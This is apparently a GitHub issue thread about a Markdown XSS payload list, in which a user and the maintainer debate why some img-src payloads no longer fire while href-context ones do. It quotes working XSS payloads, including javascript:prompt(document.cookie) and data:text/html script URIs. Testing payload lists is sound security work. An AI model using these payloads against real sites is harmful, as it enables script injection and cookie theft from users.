### ISSUE TITLE
There are a few payloads that don't work anymore in any browser

### ISSUE THREAD

**Issue by marcelo321** [cujanovic/Markdown-XSS-Payloads#2]
Testing a website i found out that some payloads were accepted but there was no alert, so i copy-pasted this payloads and tested in some browsers and it doesn't work, you should update/check this payloads too.
```

<img src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K" alt="a">
<img src="javascript:prompt(document.cookie)" alt="a">
<img src="javascript:alert(9)" alt="a">
```

might be others but this don't actually trigger any alert

**Comment by cujanovic** [comment]
Can you please provide the specific payloads so I can check? Thanks.

**Comment by marcelo321** [comment]
<img src="javascript:prompt(document.cookie)" alt="a">

**Comment by marcelo321** [comment]
i edited the last comment with the proper payload that appears to not work in any browser. Those are a result of this payload

`![a](javascript:prompt(document.cookie))\` and this `![a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\`

But you should just check the above payloads directly in all browsers, it just doesn't work anymore.

**Comment by cujanovic** [comment]
Well in proper context this payloads work:
https://localdomain.pw/xss/?ahref=javascript:alert(9)
https://localdomain.pw/xss/?ahref=javascript:prompt(document.cookie)

On the other hand the payload doesn't work:
https://localdomain.pw/xss/?ahref=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K

But the payload without base64 works: https://localdomain.pw/xss/?ahref=data:text/html,%3Cscript%3Ealert(1)%3C/script%3E works.

I'm going to close this, if some payloads don't work on modern browsers, there is always an option to try some legacy browsers.

P.S. This payloads were collected from various BB reports so they all worked once in some libs.

**Comment by marcelo321** [comment]
@cujanovic 
hmmm the examples you gave me are from <a href="payload" and we all know that those work fine. the examples i gave you are from
<img src="payload"> that don't work anymore in any browser.

**Comment by cujanovic** [comment]
I don't think that they ever worked in img src context, they were always in a href context in markdown not in img src.

**Comment by cujanovic** [comment]
https://michelf.ca/blog/2010/markdown-and-xss/

**Comment by marcelo321** [comment]
yea that might be true, then delete those payloads haha because they don't work.
